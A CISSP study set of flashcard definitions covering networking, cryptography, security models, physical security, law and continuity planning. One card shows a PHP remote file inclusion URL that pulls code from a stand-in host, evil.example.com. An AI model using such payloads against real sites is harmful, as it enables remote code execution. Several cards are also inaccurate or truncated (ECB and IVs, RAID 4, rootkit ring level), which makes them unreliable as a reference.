CISSP Study Set
Ethernet
dominant local area networking technology that transmits network data via frames. Originally physical bus, now supports physical star. Evolved to 1000 megabits to 10
Add Round Key
final function applied in each round. XORS the state with the subkey. Subkey is derived from the key.
Differential Cryptanalysis
find the "difference" between related plaintexts that are encrypted. The plaintexts may differ by a few bits.
Origin of Term: Computer
first used in 1613 to describe a person who added numbers
Static Routes
fixed routing entries, saying "The route for network 10.0.0.0/8 routes via router 192.168.2.7
The User Acceptance test
focuses mainly on the functionality thereby validating the fitness-for-use of the system by the business user.
Cache Memory
is the fastest memory on the system, required to keep up with the CPU as it fetches and executes instructions. Fastest portion is the register file
Host-to-gateway(IPsec)
Client Mode; used to connect one system that runs IPsec client software to an IPsec gateway
Core Impact
Closed Source Penetration Testing Tool
Closed source
Closed source software is software typically released in executable form
SSO Disadvantages
Difficult to retrofit. Unattended desktop. Single point of attack/failure
Elliptic Curve Cryptography
ECC leverages a one-way function that uses discrete logarithms as applied to elliptic curves
HEPA
High efficiency particulate air filters
HDLC
High-Level Data Link Control. Successor to SDLC. HDLC adds error correction and flow control. ARM an ABM modes
IPID
IP Identification field is used to re-associate fragmented packets. "Copy this data beginning at offset 1480."
Data Owner
Information Owner. Management employee responsible for ensuring that specific data is protected. Responsible for enuring data is protected.
Information Security Governance
Information Security at the organizational level. It is the organizational priority provided by senior leadership.
Interrupt
Interrupts are a form of an asynchronous event that occurs. I.E, CPU stops processing current task.
Token Ring(Deterministic
Legacy. Possession of a token allows a node to read or write traffic on a network
VPN
Protected via standards-based end-to-end encryption. IPSEC VPN. May used as measure in Defense in Depth.
RAID
Redundant Array of Inexpensive Disks has the goal to help mitigate the risk associated with hard disk failure
Semantic integrity
each attribute (column) value is consistent with the attribute data type
ePHI and HIPPA
electronic Protected Healthcare Information(ePHI) 2009 Update to U.S. Health Insurance Portability and Accountability Act. Encrypted Health Information is a requirment.
Dynamic Signature
measure the process by which someone signs his/her name.
Partial-Knowledge
are in between zero and full knowledge: the penetration tester receives some limited trusted information.
POPv3
are used for client-server email access
2nd Gen Language
assembly
Assess
assess the extent of the damage to determine the proper steps necessary to ensure the organization's ability to meet its mission and Maximum Tolerable Downtime (MTD).
Backups
assure the availability and integrity of mobile data
Script Kiddies
attack computer systems witth tools and have little or no understanding of. eg; Metasploit framework.
Inference
attacker must logically deduce missing details: unlike aggregation, a mystery must be solved.
Time of Check/Time of Use Attacks
attacks are also called race conditions: an attacker attempts to alter a condition after it has been checked by the operating system, but before it is used.
Disassembler
attempts to convert machine language into assembly.
Root-cause analysis
attempts to determine the underlying weakness or vulnerability that allowed the incident to be realized.
Organization Registration Authorities(ORAs)
authenticate the identity of a certificate holder before issuing a certificate to them
Object Oriented Database
combines data with function of code an object-oriented framework/infrastructure.
Pipe lining
combines multiple steps into one combined process. Pipeline Depth is the number of simultaneous stages that may be completed at once. Like and automobile assembly line.
Hybrid Analysis
combines objective quantitative analysis and subjective qualitative analysis.
Computer Crime: 3 Types
computer systems as targets, computer systems as a tool to perpetrate the crime, or computer systems involved but incidental.
Level 2 Caches
connected to (but outside) the CPU. SRAM is used for cache memory.
Host-to-Host/Transport Layer
connects the Internet Layer to the Application Layer Layer 4 (Transport)
Customary Law
customs our practices that are so commonly accepted by a group that the custom is treated as law. Concept of "best practices" is closely associated with Customary Law.
Slack space
data is stored in specific size chunks known as clusters (clusters are sometimes also referred to as sectors or blocks)
Layer 6 - Presentation
presents data to the application (and user) in a comprehensible way
Account lockouts
prevent an attacker from being able to simply guess the correct password by attempting a large number of potential passwords
Interface Testing
primarily concerned with appropriate functionality being exposed across all the ways users can interact with the application.
Symmetric ciphers
primarily used for confidentiality
Rootkits
replaces portion of the kernel and\or operating system. Lies in ring 3. Commonly rootkitted binaries include the ls or ps commands on Linux/UNIX.
Object-Oriented Programming (OOP)
replicates the use of objects in computer programs.
NIDS
require promiscuous network access in order to analyze all traffic
Health Insurance Portability and Accountability Act (HIPAA)
requires that medical providers keep the personal and medical information of their patients private.
Pool NAT
reserves a number of public IP addresses in a pool
Scoping
the process of determining which portions of a standard will be employed by an organization. Eg, wireless provisions for a wireless company would out-of-scope.
Software Escrow
the process of having a third party store an archive of computer software. Often negotiated as part of a contract with a proprietary software vendor
Facial Scan
the process of passively taking a picture of a subject's face and comparing that picture to a list stored in a database
Client-Side Attacks
user downloads malicious content. Difficult for organization that allow Internet access. Clients include word processing software, spreadsheets, media players, web browsers. Flash, acrobat, iTunes, Quicktime.`
Multicast
uses "Class D" addresses when used over IPv4. Eg: streaming audio or video
Traceroute
uses ICMP Time Exceeded messages to trace a network route
War dialing
uses a modem to dial a series of phone numbers. Looks for answering modem carrier.
Dictionary Attack
uses a word list: a predefined list of words, and each word in the list is hashed. If the cracking software matches the hash output from the dictionary attack to the password hash, the attacker has successfully identified the original password.
Hacker
A malicious individual who attacks computer systems.
AES
Advanced Encryption Standard. Current US standard for symmetric block cipher. Uses 128 bit(10 rounds), 192 bit(12 rounds of encryption, 256 bit(14 rounds of encryption). FIPS approved standard until 2030.
Internet Layer
Aligns with Layer 3 (Network) layer of the OSI model
CMP
Crisis Management Plan designed to provide effective coordination among the managers of the organization in the event of an emergency or disruptive event.
Socket Pairs
Describes a unique connection between two nodes. "Established" during a connection
Information Flow Model
Describes how information may flow in a secure system.
Biometric Enrollment
Describes the process of registering with a biometric system. Creating an account for the first time
Compliance(Policy)
Describes two related issues: How to judge the effectiveness of the policies(how well they work), and what happens when the policy is violated.
SDLC 5
Design
Compliance acceptance testing
It is also known as regulation acceptance testing is performed against the regulations which must be adhered to, such as governmental, legal or safety regulations
PPP
Layer 2 protocol that has largely replaced SLIP. PPP is based on HDLC (discussed previously), and adds confidentiality, integrity, and authentication via point-to-point links. Synchronous links(T1's)
SLIP
Layer 2 protocol that provides IP connectivity via asynchronous connections such as serial lines and modems
Switch
Layer 2, based on MAC
Router
Layer 3 Devices that routes traffic from one LAN to another LAN. IP based routers make routing deisions based on the source and destination IP Addresses.
Routers
Layer 3 devices that route traffic from one LAN to another
Router
Layer 3, based on IP
Packet Filter and Stateful Firewalls
Layers 3 and 4. IP Addresses and Ports.
FDDI
Legacy. Fiber Distributed Data Interface. A logical network ring via a primary and secondary counter-rotating fiber optic ring
Unit Testing
Low-level tests of software components, such as functions, procedures or objects
Virtualization Benefits
Lower hardware cost, less cooling needs, snapshots allow reversion to past states.
Water(Fire)
Lowers temperature
1st Gen Language
Machine Code
802.1X
Port Based Network Access Control. Includes EAP
Detective Controls
They alert during or after a successful attack. Intrusion detection systems(IDS) and CCTV are examples of detective controls.
Archive Bits
This bit is a file attribute used to determine whether a file has been archived since last modification. Incremental will set bit from 1 to 0 after backup.
Static testing
includes walkthroughs, syntax checking, and code reviews
Screened Host Architecture
is an older flat network design using one router to filter external traffic to an from a bastian host.
DCOM
locate objects over a network.
Business Continuity Plan
long-term plan to ensure the continuity of business operations
Volatile Memory
loses integrity after power loss.
Remote Journaling
may be used to recover from a database failure.
Evacuation Routes
meeting points are critical.
Return on Investment
money saved by deploying a safeguard
Preponderance
more likely than not.
Hashing
one way cryptographic transformation
Unicast
one-to-one traffic, such as a client surfing the Web
Hash Function
one-way encryption use an algorithm and no key
Cripple ware
partially functioning proprietary software, often with key features disabled.
Magnetic Stripe Card
passive device that contains no circuits. Read when swiped through a card reader.
Cohesive Object
perform most functions independently. Inverse relation to Coupling.
EU-US Safe Harbor
personal data of EU Citizens may not be transmitted, even when permitted by the individual, to countries outside the EU unless the receiving country is perceived by the EU to adequately protect data.
Security Safeguards Principle
personal data should be reasonably protected against unauthorized use.
Use Limitation Principle
personal data should never be disclosed without either the consent of the individual or as the result of a legal requirement
Smart Card
physical access control device that is often used for electronic locks, credit card purchases. Can be Contact of Contactless
Procedural languages
programming languages that user subroutines procedures and functions
Top-Down (TD)
programming starts with the broadest and highest level requirements (the concept of the final program)
Surge
prolonged high voltage
Blackout
prolonged loss of power
Corrective Controls
work by "correcting" a damaged system or process. The corrective access control typically works hand-in-hand with detective. Antivirus software is an example.
Pattern Matching IDS
works by comparing events to static signatures
Coupled Object
requires lots of other objects to perform basic jobs, like math. Inverse to cohesion
Broadcast
sent to all stations on a LAN
Shadow Database
serves as a live backup for a database. Not regularly accessed by the client.
Circumstantial Evidence
serves to establish the circumstances related to particular points or even other evidence.
Fault
short loss of power
Fences
simple deterrent
Unlicensed Band
small amount of contiguous radio spectrum set aside for unlicend
Applets
small pieces of mobile code that are embedded in other software such as Web browsers. Executables written in a variety of languages.
Register
small storage locations used by the CPU to store instructions and data.
Cryptographic requirements
speed, strength, cost, complexity must be weighed against each other.
Weak Tranquility Property
states that security labels will not change in a way that conflicts with defined security properties
Strong Tranquility Property
states that security labels will not change while the system is operating.
Dynamic Random Access Memory (DRAM)
stores bits in small capacitors (like small batteries), and is slower and cheaper than SRAM. DRAM Capacitors leak charge. they must be continually refreshed to maintain integrity.
Multilevel
stores objects of differing sensitivity lables and allows system access by subjects wit differing clearances. A reference monitor mediates access between subjects and objects.
Compilers
such as C or Basic, and compile it into machine code.
Soda Acid
suppresses fire, starving oxygen to fire
Mirroring
used to achieve full data redundancy by writing the same data to multiple hard disks
SMTP
used to transfer email between servers
Processes and Threads
Process is an executable program. Heavy Weight Process(HWP) is also called a task. Parent process may spawn child processes called threads. Sharing memory, these processes are less exhaustive.
Procurement
Process of acquiring products or services from a 3rd party.
ISO 17799
Renumbered to 27002 in 2005. ISO 27001 is a related standard, formally called ISO/IEC 27001:2005 Information Security Managment Systems-Requirements. Based on BS 7799 Part 2.
Hub
Repeater with two or more ports. No Security, no Isolation. Half Duplex. One "Collision" Domain. Unsuitable for Modern purposes
ROC
Report of Compliance
RFC
Request for Comments, a way to discuss and publish standards on the Internet
Security Policies and Procedures
Required parts of any successful information security program.
SDLC 4
Requirements Analysis
Technical Countermeasures
Routers, switches, firewalls.
User Access Permissions Table
Rows show capabilities of each subjects(capability list). Columns show the ACL for each object or application
Paravirtualization
Runs Modified OS
Multiprocessing
Runs multiple processes on multiple CPU's. Two types of multiprocessing Symmetric Multiprocessing(SMP)
iSCSI
SAN protocol that allows for leveraging existing networking infrastructure and protocols to interface with storage
ECB
SImplest and weakest from of DES. Using initialization vector(IV) or chaining. Identical plaintexts with identical keys encrypt identical cipher text **BLOCK***
Annualized Loss Expectancy(ALE)
SLE X ARO; Cost of losses per Year
The TCP handshake
SYN, SYN-ACK, ACK. The client chooses an initial sequence number, set in the first SYN packet. Once a connection is established, ACKs typically follow for each segment
Preamble
Safety of the commonwealth duty to our principals, and to each other requires that we adhere, to the highterst ethical standaards of behavior.
RAID 4
Same as 4. Stripes data at the block.
Side-Channel Attack
Side-channel attacks use physical data to break a cryptosystem, such as monitoring CPU cycles or power consumption used while encrypting or decrypting
Cipher Feedback
Similar to CBC. CFB is a stream mode cipher, uses an IV(Random Number/NONCE), errors propagate. **STREAM**
SMTP
Simple Mail Transfer Protocol, a store-and-forward protocol used to exchange email between servers
SNMP
Simple Network Management Protocol, primarily used to monitor network devices. HP OpenView and MRTG use SNMP
Vernam Cipher
Simple XOR cipher that can be implemented with phone switches.
Thin Clients
Simple than normal computer systems, with hard drives, full operating systems, locally installed applications, etc. They rely on servers for applications and storage of associated data. Eg: Diskless workstations. Use WEb Browser as a universal client
Asymmetric and Symmetric Tradeoffs
Slower than symmetric, and weaker per bit of key length. But much more secure
SCSI
Small Computer System Interface Disk Drive
Band
Small amount of contiguous radio spectrum. Wireless tech uses 2.4 and 5 ghz
FCoE
Storage Area Network(SAN) leverages Fiber Channel, which has long been used for storage networking
Data at Rest
Stored Data. Residing on a Disk or In a File.
Firmware
Stores small programs that do not change frequently, such as a computer's BIOS. Router OS.
Stream Cipher
Stream modes(ciphers) means each bit is independently encrypted
RAID 3
Striped Set with Dedicated Parity (Byte Level). Striping is desirable due to the performance gains associated with spreading data across multiple disks. An additional disk is leveraged for storage of parity information, which is used for recovery in the event of a failure.
RAID 5
Striped Set with Distributed Parity. Focus on striping for the performance increase. And parity in case of failure
RAID 6
Striped Set with Dual Distributed Parity
RAID 0
Striped Set: employs striping to increase the performance of read and writes
Bollard
Strong post designed to stop a car, Also to tie ship to pier. Installed in front of building to protect them. Large concrete planters are used to the same effect.
Writing Up
Subject writes up; data flows up.
Qualitative Analysis
Subjective analysis of approximate values
Role-Based Access Controls
Subjects are grouped into roles and each defined role has access permissions based upon the role, not the individual
Polyalphabetic cipher
Substitution
File Permissions
Such as read, write, and execute, control access to files.
BCP/DRPaS
SunGard Casualty Services(IBM)
Tailoring Process: 5
Supplementing baselines with additional security controls and control enhancements, if needed; and;
Pairwise Testing
Suppose we want to demonstrate that a new software application works correctly on PCs that use the Windows or Linux operating systems.
Thrashing
Swapping memory from active processes when both RAM and Swap Space is full. Impacts availability
SPAN ports
Switched Port Analyzer (SPAN) port is one way to see unicast traffic sent to and from other devices on the same switch. SPAN(Cisco), Mirror(HP). Can be the cause of bandwidth over load(24-port switch/mirror 23 100 mbit streams.)
Kerberos Characteristics
Symmetric encryption. Provides mutual authentication of both clients and servers. Potects against network sniffing and replay attacks
14:SYN
Synchronize a connection
Integration Testing
Testing multiple software components as they are combined into a working system. Subsets may be tested, or Big Bang integration testing tests all integrated software components
Regression Testing
Testing software after updates, modifications, or patches
Installation Testing
Testing software as it is installed and first operated
User Acceptance Testing
Testing that is done directly by the customer.
Static Testing
Tests code passively: the code is not running.
Dynamic Testing
Tests code while executing it
***Canons Note***
The canons are applied in order, and when face with an ethical dilemma, you must follow the canons in order. i.e
Difference between Reading Up & Writing Down
The direction that information is being passed
Security Target (ST)
The documentation describing the ToE, including the security requirements and operational environment
Full Backup
The easiest to understand of the types of backup; it simply is a replica of all allocated data on a hard disk. Time is a con
Target of Evaluation(ToE)
The system or product that is being evaluated
Modem
"Modulator/Demodulator" takes binary data and modulates it into anolog sound that can be carried on phone networks designed to carry voice.
Bell-LaPadula Security Model
"No Read Up" (NRU). Also known as the the Simple Security Property. Focused on protecting confidentiality.
Simple Integrity Axiom
"No read down:" A subject at a specific classification level cannot read data at a lower classification. Prevents movement of bad information
Simple Security Property
"No read up:" a subject at a specific classification level cannot read an object at a higher classification level. 'Secret' Clearance holders not able to access 'Top Secret'
* Security Property(Star Security Property)
"No write down." A subject at a higher classification level cannot write to a lower classification level.
* Integrity Axiom
"No write up:" A subject at specific classification level cannot write to data at a higher classification.
PROM
(Programamble Read Only Memory) can be written to once, typically at the factory.
Reserved Ports
0-1023
Class A
0.0.0.0 - 127.255.255.255 16,777,216 addresses
Project Initiation
1. Develop the contingency planning policy statement 2. Conduct the business impact analysis (BIA) 3. Identify preventive controls 4. Develop recovery strategies 5. Develop an IT contingency plan 6. Plan testing, training, and exercises 7. Plan maintenance
BIA Processes
1. Identification of Critical Assets 2. Comprehensive Risk Assessment
CHAP Process
1. Server sends a challenge 2. The user takes the challenge string and the password, uses a hash cipher such as MD5. 3. The CHAP server also hashes the password and challenge, creating the expected response
AES Four Functions
1. SubBytes 2. ShiftRows 3. MixColumns 4. AddRoundKey Functions provide confusion,diffusion, and XOR encryption.
COBIT; 4 domains
1.Plan and Organize, 2.Accquire and Implement 3.Deliver and Support 4.Monitor and Evaluate
TGT Lifetime
10 Hours
Ephemeral Ports
1024-65535
IPv6 header
128 bits in All:(use colons instead of periods) Version: IP version Traffic Class and Flow Label Payload Length Next header Hop Limit fc01::20c:29ff:feef:1136/64 (Scope:Global) fe80::20c:29ff:feef:1136/64 (Scope:Link)
Class B
128.0.0.0.0 - 191.255.255.255 65,536 addresses
Bluetooth(802.15)
2.4 ghz like 802.11. Transmit data over short distances. Class 3: under 10 meters Class 2: 10 meters Class 1: 100 meters. Automatic Discovery should be off.
IPv4 Header Fields
20 Bytes in All: Version IHL: Length of the IP header Type of Service Identification, Flags, Offset Time To Live Protocol Source and Destination IP addresses Optional
802.11 Security
802.11 wireless security standards (including WEP and 802.11i/WPA2
Types of Wireless
802.11: 2Mbps/2.4 ghz 802.11: 54Mbps/5ghz 802.11: 11Mbps/2.4 ghz 802.11: 54Mbps/2.4 ghz 802.11: 72-600/2.4 ghz/5ghzy
Supplicant
802.1X client
Object
A "black box" that combines code and data, and sends and receives messages
Rainbow Tables
A Rainbow Table is a pre-computed compilation of plaintexts and matching ciphertexts (typically passwords and their matching hashes)
Penetration Tester
A White Hat Hacker who receives authorization to attempt to break into an organization's physical or electronic perimeter.
Backup
A backup is the most basic and obvious measure to increase system or data fault tolerance by providing for recoverability in the event of a failure.
Switch
A bridge with two or more ports. bet practice; connect one device per switch. Associates MAC address of each computer and server with its port. Shrinks collision domain.
Memory
A series of on-off swtiches representing bits: 0's off. 1's on. Random Access Memory, Sequential Memory, Read Only Memory are all types.
Tape Rotation Methods
A common tape rotation method is called FIFO
Removable Media Controls
A common vector for malware propagation is the AutoRun feature of many recent Microsoft operating systems. Turn off Autorun functionality.
Licenses
A contract between a provider of Software and the consumer.
Remote wipe capability
Ability to erase data from a lost or stolen device remotely.
Ring Model
A form of CPU hardware layering that separates and protects domains. Ex: Intel x86, has four rings ranging from 0(kernel) to ring 3 (user). Innermost ring is most trusted. Concentric communication between rings
Clearance
A formal determination of whether or not a user can be trusted. Require interview
Hub
A half duplex device. Like a repeater but with more than two ports. (No Security). Cannot send and receive simultaneously. Can provide
Caesar Cipher
A historical example of a substitution cipher.
Known Plaintext Attack
A known plaintext attack relies on recovering and analyzing a matching plaintext and ciphertext pair. Multiple ciphertexts maybe encrypted with same key
Retina Scan
A laser scan of the capillaries that feed the retina. Retina scans are rarely used because of health risks and invasion-of-privacy issues
Lights
A light that allows a guard to see an intruder is acting as a detective control. Fresnel lenses to aim light in a specific direction. Measured in Lumens
Spring-bolt lock
A locking mechanism that "springs" in and out of the doorjamb
Process Isolation
A logical control that attempts to prevent one process from interfering with another. This is a common feature among multi user operating. Lack of Process Isolation in OS's like MS-DOS. Another user should not be able to have an effect on that process(Trojan)
***EXAM Warning***
A logical ring can run via a physical ring, but there are exceptions. FDDI uses both a logical and physical ring.
Hanlon's Razor
A maxim that reads "Never attribute to malice that which is adequately explained by stupidity."
Meet-in-the-Middle Attack
A meet-in-the-middle attack encrypts on one side, decrypts on the other side, and meets in the middle. Attack against double DES which encrypts two keys in "Encrypt, Encrypt..." Seeks to recover the 2 keys used to encrypt.
Redundant Array of Inexpensive Disks
A method of using multiple disk drives to achieve greater data reliability, greater speed, or both
Callback
A modem-based authentication system. Callback account is created, the modem number the user will call from is entered into the account.
Advanced Encryption Standard
A modern cipher
DevOps
A more agile development and support model echoing the agile programming methods. "the practice of operations and development engineers participating together in the entire service lifecycle, from design through the development process to production support."
TACACS
A ntralized access control system that requires users to send an ID. TACACS uses UDP port 49 (and may also use TCP). Reusable passwords are a vulnerability
Object
A passive data file
Ring Topology
A physical ring connects network nodes in a ring
Covert Channel
A policy-viloating communication that is hidden from the owener or user of a data system. There are unused fields within the TCP/IP Headers which may be used for covert channels. Eg: Obfuscation.
Mantrap
A preventive physical control with two doors. Each door requires a separate form of authentication to open
ISO/IEC 24762:2008
A separate ISO plan for disaster recovery. Information technology—Security techniques—Guidelines for information and communications technology disaster recovery services.
Clark Wilson
A real world integrity model that protects integrity by requiring subjects to access objects via programs. Effectively limits the capabilities of the subject. Well formed transactions, Separation of Duties.
Packet Filter
A simple and fast firewall. Has no concept of state. Decisions are made on basis of single packet. EG: allows ICMP Echo Replies, and UDP DNS Replies.
Counter-based synchronous dynamic tokens
A simple counter: the authentication server expects token code 1, and the user's token displays the same code 1. Once used, the token displays the second code, and the server also expects token code 2. PIN
IPsec Security Association (SA)
A simplex(one-way) connection that may be used to negotiate ESP or AH parameters. Unique 32 Bit number called Security Parameter Index(SPI) identifies each simplex SA connection.
Procedure
A step-by-step guide for accomplishing a task. Like Policies, they are mandatory
Access Control Matrix
A table that defines access permissions between specific subjects and objects. A matrix is a data structure that acts as a table lookup for the operating system.
Fuzzing
A type of black box testing that submits random, malformed data as inputs into software programs to determine if they will crash
Roaming Infected Laptop
A user with an infected laptop plugs into a typical office network and requests an IP address from a DHCP server. Once given an IP, the malware installed on the laptop begins attacking other systems on the network. EAP Protects. WLANs are susceptible
Transformation Procedure (TP)
A well-formed transaction, and a constrained data item (CDI) is data that requires integrity. For each TP, an audit record is made and entered into the access control system. Provides both detective and recovery controls in case integrity is lost.
Abstraction
Abstraction hides unnecessary details from the user. Complexity is the enemy of security. The more complex a process, the less secure it is. User presses play; hears music.
Need to Know
Access determination is based upon clearance levels of subjects and classification levels of objects. A form of Mandatory Access Control.
2 Types of NIPS
Active Response, and Inline
ActiveX
ActiveX controls are the functional equivalent of Java applets. They use digital certificates instead of a sandbox to provide security.
8:CWR
Added in 2001: Congestion Window Reduced
9:ECE
Added in 2001: Explicit Congestion Notification Echo)
Fire Class A
A: Ordinary Combustibles -Wood -Paper -Rubber -Plastic
Asynchronous Balanced Mode
ABM initiating transmissions without receiving permission
Malware
AKA Malicious Code. The generic term for any type of software that attacks and application or system. Viruses, worms, Trojans, Logic Bombs.
Note!
All Information Security Professionals should understand Hanlon's Razor. There is plenty of malice in our world: worms, phishing attacks, identity theft, etc. But there is more brokenness and stupidity: most disasters are caused by user error. "Never attribute to malice that which is adequately explained by stupidity
Convergence
All routers on a network agree on the state of routing. A network that has experienced no recent outages is normally "converged". Closest routers know of outage first.
Application Whitelisting
Allowing binaries to run that: Are signed via a trusted code signing digital certificate. Match a known good cryptographic hash Have a trusted full path and name
Decentralized access control
Allows IT administration to occur closer to the mission and operations of the organization. An organization spans multiple locations, and the local sites support and maintain independent systems, access control databases, and data
Multitasking
Allows multiple tasks (heavy weight processes) to run simultaneously on one CPU. Older OS's are non-multitasking.
Hypervisor
Allows multiple virtual operating guest to run one one host
Trusted Computer System Evaluation Criteria(TCSEC)
Also known as the Orange Book
PHP Remote File Inclusion (RFI)
Altering normal PHP URLs and variables such as "http://good.example.com?file=readme.txt" to include and execute remote content, such as: http://good.example.com?file = http://evil.example.com/bad.php[42]
NIPS
Alters the flow of the traffic. Two types. Active Response and Inline
***EXAM WARNING*** Best thing to do?
Always consider hire or ask an expert as a valid choice in regards to "the best thing to do." The safest answer is often the best. The legal, ethical, and fair answer is usually the best as well.
***EXAM WARNING***
Always ensure that any forensic actions uphold integrity, and are legal and ethical.
SIGABA
American encryption device
Subject
An active entity on a data system. People accessing data files, DLL or Perl script that updates database files with new information.
Collusion
An agreement between two or more individuals to subvert the security of a system
Waterfall Model
An application development model that uses rigid phases; when one phase ends, the next begins
WLAN DoS
An attacker can pollute wireless spectrum(Channel Interference)
VMEscape
An attacker exploits the host OS or a guest from another guest. IDS's and IPS's can be blinded by virtualization. SPAN port cannot see traffic between virutal hosts.
Protection Profile(PP)
An independant set of security requirements and objectives for a specific category of products or systems, such as firewalls or intrusion detection systems(IDS)
Implementation Attacks
An implementation attack exploits a mistake (vulnerability) made while implementing an application
International Common Criteria
An internationally agreed upon standard for describing and testing the security of IT products. Designed to avoid requirements beyond current state of the art. Presents a hierarchy of requirements for a range of classifications and systems.
Iris Scan
An iris scan is a passive biometric control. A camera takes a picture of the iris. Compares photos within the authentication database
Object
Any passive data within the system. Objects can range from documents on physical paper, to database tables to text files. Objects are passive; they do not manipulate other objects.
Preventive Controls
Apply restriction to what a potential user, either authorized or unauthorized, can do. Pre-employment drug screening is preventative
Tailoring Process: 2
Applying scoping considerations tothe remaining baseline security controls;
Turn stiles
Are designed to prevent tailgating. Enforcing one-person authentication
Baselines
Are uniform ways of implementing a standard. "Harden the system by applying the Center for Internet Security Linux benchmarks." Discretionary
ANN
Artificial Neural Network seeks to replicate the capabilities of biological neural networks.
Humidity Levels
Computers and Data Centers: 40-55% 68-77 Degrees F. Suffiecient Airflow is key. Green push recently has widened te rnage for temp and humidity levels
NIST SP800-34
Aspecific set of requirements to review and implement a sound BCP • Project Initiation • Scope the Project • Business Impact Analysis • Identify Preventive Controls • Recovery Strategy • Plan Design and Development • Implementation, Training, and Testing • BCP/DRP Maintenance
PCI Qualifies Security Assesor
Assesses the security of an organization that uses credit cards. Report of Compliance(ROC) and Attestation of Compliance(AOC) may be issued
Tailoring Process: 4
Assigning specific values to organization-defined security control parameters via explicit assignment and selection statements
Trademarks
Associated with marketing. Purpose is to allow for the creation of a brand that distinguished the source of products or services.
Wireless Security
Associated with shared tenancy. Wireless attacks raise concerns
3 A's of Access Control
Authentication, Authorization, and Accountability
Penetration Testing
Authorized attempt to break into an organization's physical or electronic perimeter (and sometimes both)
Routing Protocols
Automatically learn a network topology and determine the beast routes between all network points. Employs backup routes in case of router outage.
Security Awareness and Training
Awareness changes user behavior. Training provides a skill set.
Kerberos 4
Ay user may request a session key for another user. Kerberos does not mitigate a malicious local host: plaintext keys may exist in memory or cache
Fire Class B
B: Flammable Liquids -Liquids -Greases -Gases
ISO/IEC-27031
BCP Guidelines 1. Provide a framework (methods and processes) for any organization 2. Identify and specify all relevant aspects 3. Enable an organization to measure its continuity, security 4. ICT—Information and Communications Technology 5.ISMS—Information Security Management System
EGP
BGP
CWE: Hard-coded credentials
Backdoor username/passwords left by programmers in production code
BIOS
Basic Input Output System(BIOS) Firmware is stored in ROM. While ROM is read-only, some types of ROM can be written to via flashing.
Star topology
Become the dominant physical topology for LANs
Block Cipher
Block mode(ciphers) encrypt blocks of data each round.
BOOTP
Bootstrap Protocol used (in conjunction with TFTP for download) for bootstrapping via a network by diskless systems.BIOSs now support BOOTP.
BGP
Border Gateway Protocol, the routing protocol used on the Internet. Has distance vector properties but is formally considered a path vector routing protocol.
CPU
Brains of the computer. Capable of performing complex mathematical calculations. Rated by number of clock cycles per second. 2.4 GHz has 2.4 Billion clock cycles per second.
ISO 17799
Broad based approach for Information Security code of practice. Full title ISO/IEC 17799:2005. Code of Practice for Information Security Management.
Electronic Communications Privacy Act(ECPA)
Brought search and seizure protection to non-telephony electronic communications. Protect from warrantless wiretapping. PATRIOT Act weakened some of the ECPA restrictions.
Senior Management
Business Owners and Mission Owners. Ensuring all organizational assets are protected.
Primary Information Security Roles
Business Owners, Mission Owners, Data Owners, System Owners, Custodians, and Users.
Fuji-Xerox
Business scholars and practitioners were asking such questions as 'What are the key factors to the Japanese manufacturers' remarkable successes?
Trade Secrets
Business-proprietary information that is important to an organizations ability to compete. Business information that provides a competitive edge. Due care and due diligence must be exercised.
Biba Model
Businesses desire to ensure that integrity of the information is protected at the highest level. Ensures integrity protection is vital. Has two primary rules: the Simple Integrity Axiom and the Integrity Axiom. Reverses "Bell-Lapadula" rules.
Fire Class C
C: Electrical Equipment
CIA Write Up Concept
CIA operates intelligence collection using the write up concept. The sensitivity of the final object will be much higher than the level of access of any of the agents.
3rd Gen Language
COBOL, C, Basic
COOP
Continuity Of Operations Plan. Sustain an organziations essential, strategic functions at an alternate site for up to 30 days.
Random Access Memory(RAM)
CPU may randomly access(jump to) an location in memory. Volatile but not as volatile as it once was believed
CTR
CTR is counter mode. This mode shares the same advantages as OFB(patterns are destroyed and errors do not propagate) **STREAM**
Cable modems
Cable TV providers to provide Internet access via broadband cable TV. Unlike DSL, Cable Modem bandwidth is typically shared with neighbors on the same network segment
Tree Topology
Called hierarchical network: a network with a root node, and branch nodes that are at least three levels deep.
Dust
Can cause static buildup and overheating
Vendor, Consultant, and Contractor Security
Can introduce risks to an organization. Third party personnel with access to sensitive data must be trained properly
CSMA/CD
Carrier Sense Multiple Access with Collision Detection used to immediately detect collisions within a network
CSMA
Carrier Sense Multiple Access: Shared usage on Ethernet. Avoid collisions
Embedded Device Forensics
Cell phones, GPS receiver and PDA (Personal Digital Assistant) devices are so common that they have become standard in today's digital examinations. Common carriers of Malware.
CHAP
Challenge Handshake Authentication Protocol. It uses a central location that challenges remote users. As stated in the RFC, "CHAP depends upon a 'secret' known only to the authenticator and the peer. A sniffer that views the entire challenge/response process will not be able to determine the shared secret.
Asynchronous dynamic tokens
Challenge-response tokens. Challenge-response token authentication systems produce a challenge, or input for the token device. PIN
Dynamic passwords
Change at regular intervals. RSA Security makes a synchronous token device called SecurID that generates a new token code every 60 seconds
Layered Design
Changing your physical network connection from wired to wireless (At Layer 1) has no effect on your Web Browser(at Layer 7)
Contraband Checks
Checks identifying objects that are prohibited. port blocking used in conjunction with contraband checks are part of Defense in Depth
TPM
Chip on system motherboard for authenticity. Ensures boot integrity. protects from Kernel Mode Rootkits, Full Disk Encryption.
CBC
Cipher Block Chaining: DES that XORs the previous encrypted block to the next block of plaintext to be encrypted. First block is an IV. Encryption errors happen. **BLOCK**
Running Key Cipher
Cipher that uses modular math
4th Gen Language
ColdFusion, Progress 4GL, Oracle Reports
Credential Set
Combination of both the identification and authentication of a user.
Network Access Layer
Combines Layer 1 (Physical) and Layer 2 (Data Link) of the OSI model.
Application Layer
Combines Layers 5 through 7 (Session, Presentation, and Application) of the OSI model
COTS Software
Commercial Off-the-Shelf
Secondary Evidence
Common in cases involving computers. Consists of copies of original documents and oral descriptions i.e. Logs.
Sharia Law
Common religious law for Islam. It uses the Qur'an and Hadith as its foundation.
Port Isolation
Commonly employed with the increasing density of virtualized systems in datacenters. Severely limits lateral movement. Generally cumbersome if not done virtually.
Mirroring
Complete duplication of data to another disk, used by some levels of RAID.
CISC
Complex Instruction Set Computer. Uses large set of complex machine language instructions.
COM
Component Object Model locates objects on a local system
IAB Practice 5
Compromises the privacy of users.
Source code
Computer programming language instructions that are written in text that must be translated into machine code before execution by the CPU
Computer Systems as a Target
Computer system serves as primary target. DDoS, Installing Malware for Spam, Exploiting Vulnerabilities
Bots
Computer system that is running malware that controlled via a botnet. Steal info, DoS, Send Spam
System Unit
Computer's case. Contains all of the internal electronic components. Motherboard, disk drives, power supply.
CASE
Computer-Aided Software Engineering uses programs to assist in the creation and maintenance of other computer programs. Tools Workbenches Environments 4th gen languages often use CASE
